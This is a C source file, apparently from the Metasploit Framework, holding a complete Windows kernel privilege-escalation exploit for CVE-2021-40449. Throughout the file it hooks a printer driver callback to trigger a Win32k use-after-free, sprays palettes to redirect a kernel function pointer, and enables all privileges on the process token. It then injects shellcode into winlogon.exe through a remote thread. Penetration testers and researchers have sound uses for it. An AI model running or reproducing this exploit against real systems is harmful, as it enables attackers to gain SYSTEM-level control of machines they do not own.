rapid7/metasploit-framework

View on GitHub
external/source/exploits/CVE-2021-40449/CVE-2021-40449/dllmain.c

Summary

Maintainability
Test Coverage
#pragma warning( disable : 4005 )

#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "ReflectiveLoader.c"
#include <stdio.h>
#include <winddi.h>
#include <Windows.h>
#include <psapi.h>
#include <tlhelp32.h>
#include <winspool.h>
#include "../../include/windows/common.h"
#include "../../include/windows/definitions.h"

// Several winternl.h structures are defined manually here instead of including winternl.h, because ReflectiveLoader.h
// already defines a subset of them itself. Including winternl.h alongside it would redefine those types and cause
// compilation errors, even where winternl.h's definitions are more complete or more accurate.

// Pairs a DDI callback index with the replacement function that
// SetupUsermodeCallbackHook writes into a printer driver's callback table
// (matched against DRVFN.iFunc, written to DRVFN.pfn).
typedef struct _DriverHook
{
    ULONG index;   // DDI function index, e.g. INDEX_DrvEnablePDEV
    LPVOID func;   // Replacement callback installed for that index
} DriverHook;

// Local copy of the NT counted-string structure from winternl.h.
// CreateForgedBitMapHeader uses it to describe the buffer passed as a thread name.
typedef struct _UNICODE_STRING {
    USHORT Length;         // Length of the data in Buffer
    USHORT MaximumLength;  // Capacity of Buffer
    PWSTR  Buffer;         // Pointer to the string data (not necessarily NUL-terminated)
} UNICODE_STRING;
typedef UNICODE_STRING* PUNICODE_STRING;
typedef const UNICODE_STRING* PCUNICODE_STRING;

// One entry of the SystemBigPoolInformation result, as parsed by
// CreateForgedBitMapHeader. That function reads a DWORD entry count at the
// start of the result buffer and the array of these entries from offset 8.
typedef struct
{
    DWORD64 Address;   // Allocation address; CreateForgedBitMapHeader clears the low 4 bits before use
    DWORD64 PoolSize;  // Allocation size, compared against the expected thread-name allocation size
    CHAR PoolTag[4];   // Four-character pool tag (e.g. "ThNm"); no room for a NUL terminator
    CHAR Padding[4];   // Pads each entry to 24 bytes
} BIG_POOL_INFO, * PBIG_POOL_INFO;

// Printer-driver DDI entry points resolved from, or hooked in, the user-mode driver DLL.
typedef BOOL(*DrvEnableDriver_t)(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA* pded);
typedef DHPDEV(*DrvEnablePDEV_t)(DEVMODEW* pdm, LPWSTR pwszLogAddress, ULONG cPat, HSURF* phsurfPatterns, ULONG cjCaps, ULONG* pdevcaps, ULONG cjDevInfo, DEVINFO* pdi, HDEV hdev, LPWSTR pwszDeviceName, HANDLE hDriver);
// Generic function-pointer type for storing callbacks of differing signatures;
// callers cast back to the real signature (e.g. DrvEnablePDEV_t) before invoking.
typedef VOID(*VoidFunc_t)();
// ntdll exports resolved at runtime in Setup().
typedef NTSTATUS(*NtSetInformationThread_t)(HANDLE threadHandle, THREADINFOCLASS threadInformationClass, PVOID threadInformation, ULONG threadInformationLength);
typedef NTSTATUS(WINAPI* NtQuerySystemInformation_t)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);

// Forward declaration so the hook can be referenced in driverHooks before its definition.
DHPDEV hook_DrvEnablePDEV(DEVMODEW* pdm, LPWSTR pwszLogAddress, ULONG cPat, HSURF* phsurfPatterns, ULONG cjCaps, ULONG* pdevcaps, ULONG cjDevInfo, DEVINFO* pdi, HDEV hdev, LPWSTR pwszDeviceName, HANDLE hDriver);

// Hooks installed into the selected printer driver's callback table by
// SetupUsermodeCallbackHook.
DriverHook driverHooks[] = {
    {INDEX_DrvEnablePDEV, (LPVOID)hook_DrvEnablePDEV},
};

// ntdll entry points resolved in Setup().
NtSetInformationThread_t SetInformationThread;
NtQuerySystemInformation_t QuerySystemInformation;

//Global Variables
LPWSTR printerName;                   // _wcsdup'd name of the hooked printer, used by exploit() for CreateDCW
HDC hdc;                              // DC created in exploit() and reset again from hook_DrvEnablePDEV
DWORD counter;                        // NOTE(review): not referenced anywhere in the visible source
BOOL shouldTrigger;                   // One-shot flag checked and cleared by hook_DrvEnablePDEV
VoidFunc_t origDrvFuncs[INDEX_LAST];  // Original driver callbacks saved before hooking, indexed by DDI index
DWORD64 rtlSetAllBits;                // Kernel address of RtlSetAllBits, computed in Setup()
DWORD64 fakeRtlBitMapAddr;            // Kernel address returned by CreateForgedBitMapHeader
DWORD currentProcessId;               // PID of this process, cached in Setup()

VOID SprayPalettes(DWORD size)
{
    /* Spray palettes to reclaim freed memory */

    // Builds one LOGPALETTE template and creates 0x5000 palettes from it.
    // The palette entry array is filled with two pointer values: the first
    // 0x120 qwords hold fakeRtlBitMapAddr, and the remaining qwords hold
    // rtlSetAllBits.
    //
    // size: target allocation size. The entry count is derived as
    //       (size - 0x90) / 4. The only caller in this file passes 0xe20.
    //
    // NOTE(review): the first loop always writes 0x120 qwords, so `size` must be
    // large enough that (palSize - 4) / 8 >= 0x120. Smaller values would write
    // past the malloc'd buffer, and values below 0x94 underflow palCount - 1.
    // NOTE(review): the template buffer lPalette is never freed.

    DWORD palCount = (size - 0x90) / 4;
    DWORD palSize = sizeof(LOGPALETTE) + (palCount - 1) * sizeof(PALETTEENTRY);
    LOGPALETTE* lPalette = (LOGPALETTE*)malloc(palSize);

    if (lPalette == NULL) {
        dprintf("[-] Failed to create palette");
        return;
    }

    // Skip the 4-byte palVersion/palNumEntries header so writes land in the entries
    DWORD64* p = (DWORD64*)((DWORD64)lPalette + 4);

    // Will call: RtlSetAllBits(BitMapHeader), where BitMapHeader is a forged
    // to point to the current process token (See `CreateForgedBitMapHeader`)
    // This will enable all privileges

    // Offset is specific to each version. Spray the two pointers
    // Arg1 (BitMapHeader)
    for (DWORD i = 0; i < 0x120; i++) {
        p[i] = fakeRtlBitMapAddr;
        // p[0xe5] = fakeRtlBitMapAddr;
    }

    // Function pointer (RtlSetAllBits)
    for (DWORD i = 0x120; i < (palSize - 4) / 8; i++) {
        p[i] = rtlSetAllBits;
        // p[0x15b] = rtlSetAllBits;
    }


    lPalette->palNumEntries = (WORD)palCount;
    lPalette->palVersion = 0x300;

    // Create lots of palettes
    for (DWORD i = 0; i < 0x5000; i++)
    {
        CreatePalette(lPalette);
    }
}

DHPDEV hook_DrvEnablePDEV(DEVMODEW* pdm, LPWSTR pwszLogAddress, ULONG cPat, HSURF* phsurfPatterns, ULONG cjCaps, ULONG* pdevcaps, ULONG cjDevInfo, DEVINFO* pdi, HDEV hdev, LPWSTR pwszDeviceName, HANDLE hDriver)
{
    /*
     * Replacement for the printer driver's DrvEnablePDEV callback, installed by
     * SetupUsermodeCallbackHook through driverHooks. It always forwards to the
     * original callback saved in origDrvFuncs and returns that result unchanged.
     *
     * On the first call made while shouldTrigger is TRUE, it clears the flag,
     * calls ResetDCW(hdc, NULL) a second time from inside the outer ResetDC, and
     * then calls SprayPalettes(0xe20).
     *
     * origDrvFuncs[INDEX_DrvEnablePDEV] is written in the same step that
     * installs this hook, so it is set whenever this function can be reached.
     */
    dprintf("[*] Hooked DrvEnablePDEV called");

    DHPDEV res = ((DrvEnablePDEV_t)origDrvFuncs[INDEX_DrvEnablePDEV])(pdm, pwszLogAddress, cPat, phsurfPatterns, cjCaps, pdevcaps, cjDevInfo, pdi, hdev, pwszDeviceName, hDriver);

    // Check if we should trigger the vulnerability
    if (shouldTrigger == TRUE)
    {
        // We only want to trigger the vulnerability once
        shouldTrigger = FALSE;

        // Trigger vulnerability with second ResetDC. This will destroy the original
        // device context, while we're still inside of the first ResetDC. This will
        // result in a UAF
        dprintf("[*] Triggering UAF with second ResetDC");
        HDC tmp_hdc = ResetDCW(hdc, NULL);  // NOTE(review): return value is unused
        dprintf("[*] Returned from second ResetDC");

        // This is where we reclaim the freed memory and overwrite the function pointer
        // and argument. We will use palettes to reclaim the freed memory

        dprintf("[*] Spraying palettes");

        SprayPalettes(0xe20);

        dprintf("[*] Done spraying palettes");
    }

    return res;
}

BOOL SetupUsermodeCallbackHook()
{
    /*
     * Find a local printer whose user-mode driver exports DrvEnableDriver and
     * DrvDisableDriver, and patch that driver's callback (DRVFN) table with the
     * entries listed in driverHooks.
     *
     * On success:
     *   - printerName receives a heap copy (_wcsdup) of the chosen printer's name,
     *   - origDrvFuncs[index] holds the original callback for each hooked index,
     *   - the driver module is deliberately left loaded, because its patched
     *     table must stay valid for the device context created later.
     *
     * Printers are tried in enumeration order, and any printer that fails a step
     * is skipped. Returns TRUE once one driver has been patched, FALSE otherwise.
     */

    DrvEnableDriver_t DrvEnableDriver;
    VoidFunc_t DrvDisableDriver;
    DWORD pcbNeeded = 0, pcbReturned = 0, lpflOldProtect, _lpflOldProtect;
    PRINTER_INFO_4W* pPrinterEnum, * printerInfo;
    HANDLE hPrinter;
    DRIVER_INFO_2W* driverInfo;
    HMODULE hModule;
    DRVENABLEDATA drvEnableData;
    BOOL res;

    // The first call only reports the buffer size needed for the enumeration
    EnumPrintersW(PRINTER_ENUM_LOCAL, NULL, 4, NULL, 0, &pcbNeeded, &pcbReturned);

    if (pcbNeeded == 0)
    {
        dprintf("[-] Failed to find any available printers");
        return FALSE;
    }

    pPrinterEnum = (PRINTER_INFO_4W*)malloc(pcbNeeded);

    if (pPrinterEnum == NULL)
    {
        dprintf("[-] Failed to allocate buffer for pPrinterEnum");
        return FALSE;
    }

    res = EnumPrintersW(PRINTER_ENUM_LOCAL, NULL, 4, (LPBYTE)pPrinterEnum, pcbNeeded, &pcbNeeded, &pcbReturned);

    if (res == FALSE || pcbReturned == 0)
    {
        dprintf("[-] Failed to enumerate printers");
        free(pPrinterEnum);
        return FALSE;
    }

    // Loop over printers
    for (DWORD i = 0; i < pcbReturned; i++)
    {
        // Use the i-th entry so that a failing printer is skipped rather than retried
        printerInfo = &pPrinterEnum[i];

        dprintf("[*] Using printer: %ws\n", printerInfo->pPrinterName);

        // Open printer
        res = OpenPrinterW(printerInfo->pPrinterName, &hPrinter, NULL);
        if (!res)
        {
            dprintf("[-] Failed to open printer");
            continue;
        }

        dprintf("[+] Opened printer: %ws\n", printerInfo->pPrinterName);

        // Query the size of the DRIVER_INFO_2W record, then fetch it
        pcbNeeded = 0;
        GetPrinterDriverW(hPrinter, NULL, 2, NULL, 0, &pcbNeeded);

        driverInfo = (pcbNeeded != 0) ? (DRIVER_INFO_2W*)malloc(pcbNeeded) : NULL;
        if (driverInfo == NULL)
        {
            dprintf("[-] Failed to allocate buffer for printer driver info\n");
            ClosePrinter(hPrinter);
            continue;
        }

        res = GetPrinterDriverW(hPrinter, NULL, 2, (LPBYTE)driverInfo, pcbNeeded, &pcbNeeded);

        // The printer handle is only needed to look up the driver
        ClosePrinter(hPrinter);

        if (res == FALSE)
        {
            dprintf("[-] Failed to get printer driver\n");
            free(driverInfo);
            continue;
        }

        dprintf("[*] Driver DLL: %ws\n", driverInfo->pDriverPath);

        // Load the printer driver into memory
        hModule = LoadLibraryExW(driverInfo->pDriverPath, NULL, LOAD_WITH_ALTERED_SEARCH_PATH);

        // pDriverPath lives inside driverInfo and is not needed after loading
        free(driverInfo);

        if (hModule == NULL)
        {
            dprintf("[-] Failed to load printer driver\n");
            continue;
        }

        // Get printer driver's DrvEnableDriver and DrvDisableDriver
        DrvEnableDriver = (DrvEnableDriver_t)GetProcAddress(hModule, "DrvEnableDriver");
        DrvDisableDriver = (VoidFunc_t)GetProcAddress(hModule, "DrvDisableDriver");

        if (DrvEnableDriver == NULL || DrvDisableDriver == NULL)
        {
            dprintf("[-] Failed to get exported functions from driver\n");
            FreeLibrary(hModule);
            continue;
        }

        // Call DrvEnableDriver to get the printer driver's usermode callback table
        res = DrvEnableDriver(DDI_DRIVER_VERSION_NT4, sizeof(DRVENABLEDATA), &drvEnableData);

        if (res == FALSE)
        {
            dprintf("[-] Failed to enable driver\n");
            FreeLibrary(hModule);
            continue;
        }

        dprintf("[+] Enabled printer driver");

        // Unprotect the driver's usermode callback table, such that we can overwrite entries
        res = VirtualProtect(drvEnableData.pdrvfn, drvEnableData.c * sizeof(PFN), PAGE_READWRITE, &lpflOldProtect);

        if (res == FALSE)
        {
            dprintf("[-] Failed to unprotect printer driver's usermode callback table");
            DrvDisableDriver();
            FreeLibrary(hModule);
            continue;
        }

        // For each hook, replace the matching entry in the driver's callback table
        for (DWORD h = 0; h < sizeof(driverHooks) / sizeof(DriverHook); h++)
        {
            for (DWORD n = 0; n < drvEnableData.c; n++)
            {
                ULONG iFunc = drvEnableData.pdrvfn[n].iFunc;

                if (driverHooks[h].index == iFunc)
                {
                    // Save the original so the hook can forward to it
                    origDrvFuncs[iFunc] = (VoidFunc_t)drvEnableData.pdrvfn[n].pfn;
                    drvEnableData.pdrvfn[n].pfn = (PFN)driverHooks[h].func;
                    break;
                }
            }
        }

        // Disable driver
        DrvDisableDriver();

        // Restore protections for driver's usermode callback table
        VirtualProtect(drvEnableData.pdrvfn, drvEnableData.c * sizeof(PFN), lpflOldProtect, &_lpflOldProtect);

        // Copy the name before releasing the enumeration buffer that holds it
        printerName = _wcsdup(printerInfo->pPrinterName);
        free(pPrinterEnum);

        if (printerName == NULL)
        {
            dprintf("[-] Failed to copy printer name");
            return FALSE;
        }

        return TRUE;
    }

    free(pPrinterEnum);
    return FALSE;
}

DWORD64 GetKernelBase()
{
    /* Get kernel base address of ntoskrnl.exe */

    DWORD lpcbNeeded;
    BOOL res;
    DWORD64* deviceDrivers;
    DWORD64 kernelBase;

    // Get device drivers will return an array of pointers
    // Requires at least medium integrity level
    res = EnumDeviceDrivers(NULL, 0, &lpcbNeeded);

    deviceDrivers = (DWORD64*)malloc(lpcbNeeded);

    res = EnumDeviceDrivers((LPVOID*)deviceDrivers, lpcbNeeded, &lpcbNeeded);

    if (res == FALSE) {
        return 0;
    }

    // First entry matches ntoskrnl.exe
    kernelBase = deviceDrivers[0];

    free(deviceDrivers);

    return kernelBase;
}

DWORD64 GetKernelPointer(HANDLE handle, DWORD type)
{
    /*
     * Return the kernel object address for `handle` in the current process by
     * scanning the system-wide handle table returned by
     * NtQuerySystemInformation(SystemHandleInformation).
     *
     * handle: handle value owned by the current process (currentProcessId).
     * type:   object type index the entry must have (GetProcessTokenAddress
     *         passes 0x5 for its token handle).
     *
     * Returns the object address, or 0 if the query fails or no entry matches.
     * Requires at least medium integrity level.
     *
     * NOTE(review): UniqueProcessId in this handle-table entry type may be
     * narrower than a DWORD (see definitions.h). If so, PIDs above that width
     * never match here. Confirm against the struct definition.
     */

    const NTSTATUS infoLengthMismatch = (NTSTATUS)0xC0000004L;  // STATUS_INFO_LENGTH_MISMATCH
    PSYSTEM_HANDLE_INFORMATION buffer = NULL;
    DWORD bufferSize = 0x20;
    NTSTATUS status = infoLengthMismatch;
    DWORD64 object = 0;

    // The first call uses a small non-NULL buffer because a NULL buffer was
    // observed to fail. The handle table can grow between calls, so keep
    // retrying with the reported size plus some headroom until the query
    // stops reporting a length mismatch. Attempts are bounded.
    for (DWORD attempt = 0; attempt < 8; attempt++)
    {
        buffer = (PSYSTEM_HANDLE_INFORMATION)malloc(bufferSize);
        if (buffer == NULL)
        {
            return 0;
        }

        status = QuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, buffer, bufferSize, &bufferSize);

        if (status != infoLengthMismatch)
        {
            break;
        }

        free(buffer);
        buffer = NULL;

        // Leave room for handles opened before the next attempt
        bufferSize += 0x4000;
    }

    if (buffer == NULL || status != 0)
    {
        free(buffer);
        return 0;
    }

    // Look for this process's handle with the requested value and object type
    for (size_t i = 0; i < buffer->NumberOfHandles; i++)
    {
        if (buffer->Handles[i].UniqueProcessId == currentProcessId &&
            buffer->Handles[i].ObjectTypeIndex == type &&
            handle == (HANDLE)buffer->Handles[i].HandleValue)
        {
            // Match. The kernel address is in `Object`
            object = (DWORD64)buffer->Handles[i].Object;
            break;
        }
    }

    if (object == 0)
    {
        dprintf("[-] Could not find handle");
    }

    free(buffer);

    return object;
}

DWORD64 GetProcessTokenAddress() {
    /*
     * Return the kernel address of the current process's token object, or 0.
     *
     * Opens the process token with TOKEN_ADJUST_PRIVILEGES and resolves that
     * handle through GetKernelPointer (object type index 0x5). Both handles
     * opened here are closed before returning. The token object itself remains
     * referenced by the process, so the returned address stays meaningful.
     */

    HANDLE proc, token;
    DWORD64 tokenKernelAddress = 0;

    // Get handle for current process
    proc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, currentProcessId);
    if (proc == NULL) {
        dprintf("[-] Failed to open current process");
        return 0;
    }

    // Get handle for current process token
    if (OpenProcessToken(proc, TOKEN_ADJUST_PRIVILEGES, &token) == FALSE)
    {
        dprintf("[-] Failed to open process token");
        CloseHandle(proc);
        return 0;
    }

    // GetKernelPointer can fail intermittently, so retry up to 0x100 times
    for (DWORD i = 0; i < 0x100 && tokenKernelAddress == 0; i++) {
        tokenKernelAddress = GetKernelPointer(token, 0x5);
    }

    CloseHandle(token);
    CloseHandle(proc);

    if (tokenKernelAddress == 0) {
        dprintf("[-] Failed to get token kernel address");
        return 0;
    }

    return tokenKernelAddress;
}

DWORD64 CreateForgedBitMapHeader(DWORD64 token)
{
    /* Create a forged BitMapHeader on the large pool to be used in RtlSetAllBits */

    // Cool trick taken from:
    // https://github.com/KaLendsi/CVE-2021-40449-Exploit/blob/main/CVE-2021-40449-x64.cpp#L448
    // https://gist.github.com/hugsy/d89c6ee771a4decfdf4f088998d60d19

    // Copies a 0x1000-byte user buffer into a kernel pool allocation by setting
    // it as a thread name (NtSetInformationThread with ThreadNameInformation).
    // It then locates that allocation through SystemBigPoolInformation.
    //
    // Buffer layout written here:
    //   +0x0  DWORD64 0x80   -> BitMapHeader->SizeOfBitMap
    //   +0x8  DWORD64 token  -> BitMapHeader->Buffer
    //
    // token: value stored as BitMapHeader->Buffer (Setup passes the process
    //        token's kernel address + 0x40).
    //
    // Finds the first big-pool entry tagged "ThNm" whose PoolSize equals
    // target.Length + sizeof(UNICODE_STRING). Returns its Address with the low
    // 4 bits cleared, plus sizeof(UNICODE_STRING), which is taken to be where
    // the copied name data starts. Returns 0 if no such entry is found.
    //
    // NOTE(review): CreateThread, VirtualAlloc, LocalAlloc and both ntdll calls
    // are unchecked, and nothing allocated here is released. The suspended
    // thread presumably has to stay alive for its name allocation to persist.
    // Confirm this before adding any cleanup.
    // NOTE(review): hRes is declared HRESULT but receives NTSTATUS values and is
    // never inspected. dwSize is a USHORT despite its name.

    DWORD dwBufSize, dwOutSize, dwThreadID, dwExpectedSize;
    HANDLE hThread;
    USHORT dwSize;
    LPVOID lpMessageToStore, pBuffer;
    UNICODE_STRING target;
    HRESULT hRes;
    ULONG_PTR StartAddress, EndAddress, ptr;
    PBIG_POOL_INFO info;

    // Suspended thread whose only purpose is to own the name allocation
    hThread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)NULL, 0, CREATE_SUSPENDED, &dwThreadID);

    dwSize = 0x1000;

    lpMessageToStore = VirtualAlloc(0, dwSize, MEM_COMMIT, PAGE_READWRITE);

    memset(lpMessageToStore, 0x41, 0x20);

    // BitMapHeader->SizeOfBitMap
    *(DWORD64*)lpMessageToStore = 0x80;

    // BitMapHeader->Buffer
    *(DWORD64*)((DWORD64)lpMessageToStore + 8) = token;

    target.Length = dwSize;
    target.MaximumLength = 0xffff;
    target.Buffer = (PWSTR)lpMessageToStore;

    hRes = SetInformationThread(hThread, (THREADINFOCLASS)ThreadNameInformation, &target, 0x10);

    // 1 MiB result buffer for the big-pool listing
    dwBufSize = 1024 * 1024;
    pBuffer = LocalAlloc(LPTR, dwBufSize);

    hRes = QuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemBigPoolInformation, pBuffer, dwBufSize, &dwOutSize);

    // Size of the allocation that holds the thread name
    dwExpectedSize = target.Length + sizeof(UNICODE_STRING);

    // Result layout: DWORD entry count, then BIG_POOL_INFO entries starting at offset 8
    StartAddress = (ULONG_PTR)pBuffer;
    EndAddress = StartAddress + 8 + *((PDWORD)StartAddress) * sizeof(BIG_POOL_INFO);
    ptr = StartAddress + 8;
    while (ptr < EndAddress)
    {
        info = (PBIG_POOL_INFO)ptr;

        if (strncmp(info->PoolTag, "ThNm", 4) == 0 && dwExpectedSize == info->PoolSize)
        {
            return (((ULONG_PTR)info->Address) & 0xfffffffffffffff0) + sizeof(UNICODE_STRING);
        }
        ptr += sizeof(BIG_POOL_INFO);
    }

    dprintf("[-] Failed to leak pool address for forged BitMapHeader\n");

    return 0;
}

BOOL Setup() {
    DWORD64 kernelBase, tokenKernelAddress, rtlSetAllBitsOffset;
    HMODULE kernelModule, ntdllModule;

    ntdllModule = LoadLibraryW(L"ntdll.dll");

    if (ntdllModule == NULL) {
        dprintf("[-] Failed to load NTDLL");
        return FALSE;
    }

    currentProcessId = GetCurrentProcessId();

    SetInformationThread = (NtSetInformationThread_t)GetProcAddress(ntdllModule, "NtSetInformationThread");
    QuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(ntdllModule, "NtQuerySystemInformation");

    kernelBase = GetKernelBase();
    if (kernelBase == 0) {
        dprintf("[-] Failed to get kernel base");
        return FALSE;
    }

    kernelModule = LoadLibraryExW(L"ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES);
    if (kernelModule == 0) {
        dprintf("[-] Failed to load kernel module");
        return FALSE;
    }

    tokenKernelAddress = GetProcessTokenAddress();

    if (tokenKernelAddress == 0) {
        dprintf("[-] Failed to get token kernel address");
        return FALSE;
    }

    rtlSetAllBitsOffset = (DWORD64)GetProcAddress(kernelModule, "RtlSetAllBits");
    if (rtlSetAllBitsOffset == 0) {
        dprintf("[-] Failed to find RtlSetAllBits");
        return FALSE;
    }

    rtlSetAllBits = (DWORD64)kernelBase + rtlSetAllBitsOffset - (DWORD64)kernelModule;

    fakeRtlBitMapAddr = CreateForgedBitMapHeader(tokenKernelAddress + 0x40);
    if (fakeRtlBitMapAddr == 0) {
        dprintf("[-] Failed to pool leak address of token");
        return FALSE;
    }

    return SetupUsermodeCallbackHook();
}

VOID InjectToWinlogon(PMSF_PAYLOAD msfPayload)
{
    /*
     * Copy msfPayload->dwSize bytes starting at msfPayload->cPayloadData into a
     * new executable allocation in winlogon.exe, then start a remote thread at it.
     *
     * Failures are reported through dprintf only, and the function returns
     * silently. Every handle opened here is closed before returning. On
     * failure, the remote allocation is also released.
     */

    PROCESSENTRY32 entry;
    HANDLE snapshot, proc, hthread;
    LPVOID buffer;
    INT pid = -1;

    entry.dwSize = sizeof(PROCESSENTRY32);

    snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE)
    {
        dprintf("[-] Failed to snapshot processes");
        return;
    }

    // Process32First already fills in the first entry, so examine it before advancing
    if (Process32First(snapshot, &entry))
    {
        do
        {
            if (strcmp(entry.szExeFile, "winlogon.exe") == 0)
            {
                pid = entry.th32ProcessID;
                break;
            }
        } while (Process32Next(snapshot, &entry));
    }

    CloseHandle(snapshot);

    if (pid < 0)
    {
        dprintf("[-] Could not find winlogon.exe");
        return;
    }

    proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (proc == NULL)
    {
        dprintf("[-] Failed to open process. Exploit did probably not work");
        return;
    }

    buffer = VirtualAllocEx(proc, NULL, msfPayload->dwSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    if (buffer == NULL)
    {
        dprintf("[-] Failed to allocate remote memory");
        CloseHandle(proc);
        return;
    }

    if (!WriteProcessMemory(proc, buffer, &msfPayload->cPayloadData, msfPayload->dwSize, 0))
    {
        dprintf("[-] Failed to write to remote memory");
        VirtualFreeEx(proc, buffer, 0, MEM_RELEASE);
        CloseHandle(proc);
        return;
    }

    hthread = CreateRemoteThread(proc, 0, 0, (LPTHREAD_START_ROUTINE)buffer, 0, 0, 0);

    // CreateRemoteThread signals failure with NULL, not INVALID_HANDLE_VALUE
    if (hthread == NULL)
    {
        dprintf("[-] Failed to create remote thread");
        VirtualFreeEx(proc, buffer, 0, MEM_RELEASE);
        CloseHandle(proc);
        return;
    }

    CloseHandle(hthread);
    CloseHandle(proc);
}

INT exploit(PMSF_PAYLOAD msfPayload)
{
    /*
     * Run the full chain:
     *   1. Setup() resolves addresses and hooks a printer driver.
     *   2. Create a DC for the hooked printer.
     *   3. Call ResetDC with shouldTrigger set. The hooked DrvEnablePDEV then
     *      performs the nested ResetDC and the palette spray.
     *   4. Inject msfPayload into winlogon.exe.
     *
     * Returns 0 after a setup failure or after the injection attempt, and -1 if
     * the device context cannot be created.
     * NOTE(review): main() ignores this value, and the failure codes are
     * inconsistent (0 vs -1).
     *
     * NOTE(review): hdc and printerName are never released. Confirm that the DC
     * can be torn down safely after the nested ResetDC before adding cleanup.
     */
    BOOL res = FALSE;

    res = Setup();

    if (res == FALSE) {
        dprintf("[-] Failed to setup exploit");
        return 0;
    }


    // Create new device context for printer with driver's hooked callbacks
    hdc = CreateDCW(NULL, printerName, NULL, NULL);
    if (hdc == NULL)
    {
        dprintf("[-] Failed to create device context");
        return -1;
    }

    // Trigger the vulnerability
    // This will internally call `hdcOpenDCW` which will call our usermode callback
    // From here we will call ResetDC again to trigger the UAF
    shouldTrigger = TRUE;
    ResetDC(hdc, NULL);

    // Exploit complete
    // We should now have all privileges

    dprintf("[*] Spawning remote thread");

    InjectToWinlogon(msfPayload);

    return 0;
}

LPVOID main(PMSF_PAYLOAD msfPayload) {
    /*
     * Entry point called from DllMain on DLL_PROCESS_ATTACH with the payload
     * descriptor passed through lpReserved. Runs the exploit and returns NULL.
     * The exploit's status code is not propagated.
     */
    exploit(msfPayload);

    // Return a defined value; the only caller (DllMain) discards it
    return NULL;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
    /*
     * DLL entry point.
     *   DLL_QUERY_HMODULE:  remember hinstDLL and, when lpReserved is non-NULL,
     *                       store the module handle through it.
     *   DLL_PROCESS_ATTACH: remember hinstDLL and run the exploit, treating
     *                       lpReserved as the PMSF_PAYLOAD descriptor.
     *   Any other reason:   nothing to do.
     * Always reports success.
     */
    if (dwReason == DLL_QUERY_HMODULE)
    {
        hAppInstance = hinstDLL;
        if (lpReserved != NULL)
        {
            *(HMODULE*)lpReserved = hAppInstance;
        }
    }
    else if (dwReason == DLL_PROCESS_ATTACH)
    {
        hAppInstance = hinstDLL;
        main((PMSF_PAYLOAD)lpReserved);
    }

    return TRUE;
}